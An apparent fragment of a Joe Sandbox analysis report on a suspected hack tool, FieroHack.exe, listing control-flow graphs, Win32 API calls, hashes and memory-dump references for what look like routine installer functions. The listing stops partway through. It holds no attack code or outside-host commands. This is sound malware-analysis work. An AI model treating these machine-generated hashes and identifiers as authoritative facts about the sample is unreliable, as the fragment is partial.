                                                    • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                    • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                    • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758

                                                     Control-flow Graph
                                                    control_flow_graph 477 4015bb-4015ce call 402bce call 405b28 482 4015d0-4015e3 call 405aba 477->482 483 401624-401627 477->483 491 4015e5-4015e8 482->491 492 4015fb-4015fc call 405761 482->492 485 401652-4022e2 call 401423 483->485 486 401629-401644 call 401423 call 4060f7 SetCurrentDirectoryA 483->486 499 402a5a-402a69 485->499 486->499 502 40164a-40164d 486->502 491->492 496 4015ea-4015f1 call 40577e 491->496 498 401601-401603 492->498 496->492 507 4015f3-4015f9 call 4056e4 496->507 504 401605-40160a 498->504 505 40161a-401622 498->505 502->499 509 401617 504->509 510 40160c-401615 GetFileAttributesA 504->510 505->482 505->483 507->498 509->505 510->505 510->509
                                                    APIs
                                                      • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                      • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                      • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                    • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                      • Part of subcall function 004056E4: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming,00000000,00000000,000000F0), ref: 0040163C
                                                    Strings
                                                    • C:\Users\user\AppData\Roaming, xrefs: 00401631
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                    • String ID: C:\Users\user\AppData\Roaming
                                                    • API String ID: 1892508949-159752144
                                                    • Opcode ID: 8ea1f7cc9a8bf7522c8949f70cf2fb79c547dd436f64854b827cbeb5bc810ff8
                                                    • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                    • Opcode Fuzzy Hash: 8ea1f7cc9a8bf7522c8949f70cf2fb79c547dd436f64854b827cbeb5bc810ff8
                                                    • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E

                                                     Control-flow Graph
                                                    control_flow_graph 513 405796-4057c7 CreateProcessA 514 4057d5-4057d6 513->514 515 4057c9-4057d2 CloseHandle 513->515 515->514
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                    • CloseHandle.KERNEL32(?), ref: 004057CC
                                                    Strings
                                                    • Error launching installer, xrefs: 004057A9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateHandleProcess
                                                    • String ID: Error launching installer
                                                    • API String ID: 3712363035-66219284
                                                    • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                    • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                    • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                    • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C

                                                     Control-flow Graph
                                                    control_flow_graph 516 401389-40138e 517 4013fa-4013fc 516->517 518 401390-4013a0 517->518 519 4013fe 517->519 518->519 521 4013a2-4013a3 call 401434 518->521 520 401400-401401 519->520 523 4013a8-4013ad 521->523 524 401404-401409 523->524 525 4013af-4013b7 call 40136d 523->525 524->520 528 4013b9-4013bb 525->528 529 4013bd-4013c2 525->529 530 4013c4-4013c9 528->530 529->530 530->517 531 4013cb-4013f4 MulDiv SendMessageA 530->531 531->517
                                                    APIs
                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                    • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                    • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                    • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                    • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D

                                                     Control-flow Graph
                                                    control_flow_graph 532 406500-40651a GetModuleHandleA 533 406526-406533 GetProcAddress 532->533 534 40651c-40651d call 406492 532->534 536 406537-406539 533->536 537 406522-406524 534->537 537->533 538 406535 537->538 538->536
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                      • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                      • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                      • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                    • String ID:
                                                    • API String ID: 2547128583-0
                                                    • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                    • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                    • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                    • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D

                                                     Control-flow Graph
                                                    control_flow_graph 539 405c90-405cbc GetFileAttributesA CreateFileA
                                                    APIs
                                                    • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\FieroHack.exe,80000000,00000003), ref: 00405C94
                                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesCreate
                                                    • String ID:
                                                    • API String ID: 415043291-0
                                                    • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                    • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                    • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                    • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19

                                                    Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed)
                                                    control_flow_graph 540 405c6b-405c7b GetFileAttributesA 541 405c8a-405c8d 540->541 542 405c7d-405c84 SetFileAttributesA 540->542 542->541
                                                    APIs
                                                    • GetFileAttributesA.KERNELBASE(?,?,00405883,?,?,00000000,00405A66,?,?,?,?), ref: 00405C70
                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C84
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                    • Instruction ID: e57869254d9b62c000b772120ebafc6e643eb49c03cb969dc299021a919e5f7f
                                                    • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                    • Instruction Fuzzy Hash: 67D0C972504521AFD2142728AE0889BBB55DB54271702CB36FDA5A26B1DB304C569A98

                                                    Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed)
                                                    control_flow_graph 543 405761-40576f CreateDirectoryA 544 405771-405773 543->544 545 405775 GetLastError 543->545 546 40577b 544->546 545->546
                                                    APIs
                                                    • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                    • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryErrorLast
                                                    • String ID:
                                                    • API String ID: 1375471231-0
                                                    • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                    • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                    • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                    • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                    APIs
                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                    • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                    • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                    • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                    APIs
                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                    • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                    • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                    APIs
                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                    • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                    • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                    • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                    APIs
                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,004257BA,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,004257BA,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                      • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,004257BA,74DF23A0), ref: 0040527A
                                                      • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                      • Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                      • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
                                                      • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
                                                      • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32(?,?), ref: 004065A8
                                                      • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                    • String ID:
                                                    • API String ID: 2972824698-0
                                                    • Opcode ID: baec25d5bd2dfe6d55721a489fba1732094f7a4d61ef90c6e2c4752007c8309d
                                                    • Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
                                                    • Opcode Fuzzy Hash: baec25d5bd2dfe6d55721a489fba1732094f7a4d61ef90c6e2c4752007c8309d
                                                    • Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E
                                                    APIs
                                                    • CloseHandle.KERNEL32(FFFFFFFF,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 83a8e34a36ec992e53eb10e28b6b1173665ca16798591da3225f5f7867e87012
                                                    • Instruction ID: 504de9a345f4e041b5d785333e0db00fbf57b3530eebac313f647de5124f4253
                                                    • Opcode Fuzzy Hash: 83a8e34a36ec992e53eb10e28b6b1173665ca16798591da3225f5f7867e87012
                                                    • Instruction Fuzzy Hash: D3C01231540704B6D1247F759D4F9093A58AB45736B608775B0F5B00F1D73C8669456D
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000403), ref: 004053BB
                                                    • GetDlgItem.USER32(?,000003EE), ref: 004053CA
                                                    • GetClientRect.USER32(?,?), ref: 00405407
                                                    • GetSystemMetrics.USER32(00000002), ref: 0040540E
                                                    • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                    • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                    • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                    • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                    • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054CB
                                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                    • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                    • GetDlgItem.USER32(?,000003F8), ref: 004053D9
                                                      • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040551C
                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                    • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                    • ShowWindow.USER32(00000000), ref: 00405554
                                                    • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                    • ShowWindow.USER32(00000008), ref: 004055A1
                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                    • CreatePopupMenu.USER32 ref: 004055E6
                                                    • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055FB
                                                    • GetWindowRect.USER32(?,000000FF), ref: 0040561B
                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                    • OpenClipboard.USER32(00000000), ref: 00405680
                                                    • EmptyClipboard.USER32 ref: 00405686
                                                    • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                    • GlobalLock.KERNEL32(00000000), ref: 00405699
                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                    • SetClipboardData.USER32(00000001,00000000), ref: 004056D1
                                                    • CloseClipboard.USER32 ref: 004056D7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                    • String ID:
                                                    • API String ID: 590372296-0
                                                    • Opcode ID: 72bde667a9f022dbf1faa4afe05fd8607ffa87a39ae1d7f019a30909cdfce6d0
                                                    • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                    • Opcode Fuzzy Hash: 72bde667a9f022dbf1faa4afe05fd8607ffa87a39ae1d7f019a30909cdfce6d0
                                                    • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003FB), ref: 0040465C
                                                    • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                    • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                    • lstrcmpiA.KERNEL32(0042E3C0,0042A890), ref: 00404774
